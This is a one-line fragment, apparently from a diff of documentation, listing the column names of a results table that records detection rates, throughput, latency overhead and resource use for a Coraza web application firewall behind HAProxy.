+Columns: `run_id`, `scenario`, `target_vhost`, `policy`, `tpr`, `fpr`, `tp`, `fn`, `tn`, `fp`, `waf_blocks_from_log`, `rps_waf`, `rps_direct`, `rps_degradation_pct`, `lat_p50_ms`, `lat_p95_ms`, `lat_p99_ms`, `lat_oh_p50_ms`, `lat_oh_p95_ms`, `lat_oh_p99_ms`, `coraza_mem_mb_peak`, `coraza_cpu_pct_avg`, `haproxy_mem_mb_peak`, `haproxy_cpu_pct_avg`.